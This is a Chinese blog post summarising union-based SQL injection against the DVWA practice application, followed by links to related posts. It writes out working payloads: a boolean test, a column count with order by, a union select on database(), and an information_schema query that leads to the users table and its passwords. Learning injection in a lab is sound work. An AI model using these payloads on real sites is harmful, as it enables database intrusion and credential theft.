SQL注入小结

于 2023-10-24 18:55:36 发布
阅读量112 收藏
点赞数 1
文章标签: 1024程序员节
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jdk12123/article/details/132585752
版权

SQL注入小结

一.union注入的原理以及代码演示:

1.1SQL注入漏洞的判断:

1‘ and 1=1; #与1’ and 1=2; #的返回页面是否不一样:

发现不一样,则初步判断存在SQL注入漏洞

1.2SQL注入字段数的判断:

1‘ order by 1,2,3; #如果当为3的时候出现报错,则说明字段数为2

1.3 union联合查询获取敏感信息:

1’and 1=2 union select 1, 2; #

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

说明可以使用union all

进一步获取信息:1’and 1=2 union select 1, (database()); #

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

替换之后可查其他信息:

1.4进阶SQL注入攻击:

目前已知 dvwa库下有两个字段:我们尝试获取下一步信息:

1'and 1=2 union select 1, (select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 1,2); #

limit(1,?)可以替换,这里我理解为有几个字段。

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

最终得到两个字段为:guestbook users

users表示用户,接下来我们主要获取user表里的信息:

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

最后直接出密码:

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

]

最后直接出密码:

[外链图片转存中…(img-RVWwLA1L-1693384676072)]

注意:这只是非常简单,没有任何过滤的情况。

NetDefend
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Access数据库SQL注入小结
HappyOrange2014的专栏
11-10 1万+
Access数据库SQL注入小结这里总结一下学到的Access数据库注入的知识点。
SQL注入漏洞小结
eleven_77_的博客
11-19 615
一.SQL注入漏洞的基本概念 1)前提 1, 前端传入后端的参数是用户可控的; 2, 传入的参数拼接到SQL语句,且带入数据库查询。 2)成因 由于WEB应用程序对用户输入的数据的合法性没有判断,用户通过可控参数中注入SQL语句,破坏原有SQL结构,达到编写程序时意料之外结果的攻击行为, 成因归结为两个: 1、程序编写者在处理程序和数据库交互时,使用字符串拼接的方式构造SQL语句。 2、未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句中。 二.SQL注入的分类 按参数类型分类 1)数字型注入
sql注入小结
qq_41939846的博客
09-05 82
最近在学习一些sql注入方面的知识,做个笔记,加深印象。 简单案例 SELECT username FROM users WHERE username =’ _____’ GROUP BY username ORDER BY username ASC 上述横线位置输入可以进行sql注入,输入的语句即为where 的内容,从而select出符合where 限定条件后的 username(字段)下的内...
mysql limit sql注入_SQL注入小结
weixin_32532029的博客
01-27 308
在实习的渗透测试项目中,遇到的数据库系统绝大部分是SQL Server。也算是了解和熟悉Mssql 的一个重要过程吧。获取某数据库的所有表(假设库名为fooDB)–XType=’U':表示所有用户表;–XType=’S':表示所有系统表;SELECTname FROM fooDB..sysobjects Where xtype=’U';获取某表所有字段名(假设表名为fooTable)SELECTn...
SQL注入小结
左小林的博客
02-11 2365
SQL注入小结一:什么是SQL注入二:SQL注入攻击实例三:如何防御SQL注入1. 检查变量的数据格式和数据类型2. 过滤特殊字符3. 使用预编译功能四:什么是预编译五:MyBatis怎么防范SQL注入1.mybatis中的#和$的区别:2.mybatis是如何做到防止sql注入的: 一:什么是SQL注入 SQL注入是一种网络上常见的攻击方式,是通过对程序员编写代码疏忽进行攻击的,通常通过SQL语句来实现无账号登录等操作. 二:SQL注入攻击实例 String sql = "select * from us
SQL注入漏洞学习小结
dayouzi的博客
08-22 615
Web 程序代码中对于用户提交的参数未做过滤就直接放到SQL 语句中执行,导致参数中的特殊字符打破了 SQL 语句原有逻辑,攻击者可以利用该漏洞执行任意 SQL 语句,如查询数据、下载数据、写入 webshell 、执行系统命令以及绕过登录限制等。
sql注入 小结 2021/4/3
阿刁〇的博客
04-03 192
文章目录SQL注入原理SQL注入的分类库、表、列基本手工注入流程联合查询 (1-4关)布尔盲注 (5-8关)延时注入 (9-10关) 本文是对之前一段时间所做的一个总结。 SQL注入原理 当客户端提交的数据未作处理或转义直接带入数据库,就造成了sql注入。 攻击者通过构造不同的sql语句来实现对数据库的任意操作。将恶意的SQL查询或添加语句插入到应用的输入参数中,再在后台SQL服务器上解析执行进行的攻击。 它目前是黑客对数据库进行攻击的最常用的手段之一。 SQL注入的分类 按变量类型分:数字型和字符型 按H
2021/11/22-2021/11CTFSQL注入小结ctfshow
A的博客
11-22 458
常用函数 group_concat() database() to_base64() hex() if() substr() char() regexp() floor() ceil() pi() ord() version() ascii() left() user() sleep() 库表列 information_schema information_schema.tables information_schema.columns information_schema.schemata informa
sql注入步骤小结
熊猫在路上
10-16 232
联合查询总结 步骤一:找注入点 步骤二:判断注入类型以及闭合符 步骤三:判断后台查询列数 ​ 关键语法:order by 1 %23 url转码为--> # 2 --+ url转码为--> --空格 步骤四:找显示位 ​ 关键语法:union select 1,2,3… 步骤五:查库名 1 联合查询注入使用SELECT database(); 2 盲注使用: 3 1、判断长度len(...
SQL注入绕WAF小结
05-08
自己总结SQL注入绕WAF小结,有人能指点指点就更好啦。。
PHP+mysql防止SQL注入的方法小结
12-20
SQL注入 例:脚本逻辑 $sql = "SELECT * FROM user WHERE userid = $_GET[userid] "; 案例1: 复制代码 代码如下:SELECT * FROM t WHERE a LIKE ‘%xxx%’ OR (IF(NOW=SYSDATE(), SLEEP(5), 1)) OR b LIKE ‘1=1 ...
PHP中全面阻止SQL注入式攻击分析小结
01-21
一、 引言 PHP是一种力量强大但相当容易学习的服务器端脚本语言,即使是经验不多的程序员也能够使用它来创建复杂的动态的web站点。然而,它在实现因特网服务的秘密和安全方面却...我们将解释如何保护你的脚本免于SQL注
基于EasyX的贪吃蛇小游戏 - C语言
06-05
基于EasyX的贪吃蛇小游戏 - C语言
Energy Core ECP5705-V01.pdf
06-05
Energy Core ECP5705-V01.pdf
matlabGUI学生成绩管理系统pdf
最新发布
06-05
建立基于图形用户界面GUI的学生成绩管理系统,该系统能够实现学生成绩信息的增加、删除、查询(查询某门课所有学生的成绩并显示排名,查询某个学生的各科成绩并显示排名)、课程成绩统计最高分、最低分、平均分、方差、并显示相应的排名;绘制柱状图、条形图、饼状图、正太分布曲线等功能。 通过本实验使学生掌握图形用户界面GUI的操作和设计流程,并通过编写回调函数巩固前期的知识。
高职教育品牌专业申报汇总表.doc
06-05
高职教育品牌专业申报汇总表.doc
游戏运营数据后台需求表.docx
06-05
游戏运营数据后台需求表.docx
国家开放大学数据库应用技术第三次形考作业3
06-05
使用TOP和CASE的查询。写出实现如下查询的SQL语句。  (18) 列出“数据库基础”课程考试成绩前三名的学生的学号、姓名、所在系和考试成绩。  (19) 查询Java考试成绩最低的学生的姓名、所在系和Java成绩。  (20) 查询选修了Java的学生学号、姓名、所在系和成绩,并对所在系进行如下处理:   当所在系为“计算机系”时,显示“CS”;   当所在系为“信息管理系”时,显示“IS”;   当所在系为“通信工程系”时,显示“CO”;   对其他系,均显示“OTHER”。
SQLServer 存储过程调优小结
05-17
SQL Server 存储过程是一组 SQL 语句的集合,可以被编译并保存在数据库中,以便重复使用。存储过程可以提高查询性能,减少网络流量,简化复杂的查询过程,使代码更容易维护。然而,存储过程的性能也可能受到许多因素的影响,包括查询语句的复杂性、索引的使用、参数的传递方式等等。下面是一些 SQL Server 存储过程调优的小结: 1.使用 SET NOCOUNT ON 语句:这个语句可以关闭每条 SQL 语句返回的行数,减少网络流量。 2.使用 WITH RECOMPILE 选项:这个选项可以在每次执行存储过程时重新编译查询计划,确保每次都使用最优的执行计划。 3.使用 OUTPUT 参数代替 SELECT 语句:在存储过程中,使用 OUTPUT 参数可以避免使用 SELECT 语句来返回结果集,从而减少网络流量。 4.使用适当的索引:为存储过程中的查询语句创建适当的索引可以大大提高查询性能。 5.避免使用函数:存储过程中使用函数会导致查询计划的重新编译,影响性能。 6.使用临时表:在存储过程中使用临时表可以减少查询语句的复杂性,提高查询性能。 7.使用参数化查询:使用参数化查询可以避免 SQL 注入攻击,同时可以提高查询性能。 8.避免使用大量的 IF 语句:使用大量的 IF 语句会导致存储过程的复杂性增加,影响性能。 9.使用 TRY/CATCH 语句:在存储过程中使用 TRY/CATCH 语句可以处理异常,保证代码的健壮性。 10.使用 SET ANSI_NULLS 和 SET QUOTED_IDENTIFIER 选项:在存储过程中使用这两个选项可以确保查询语句的正确性和可靠性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值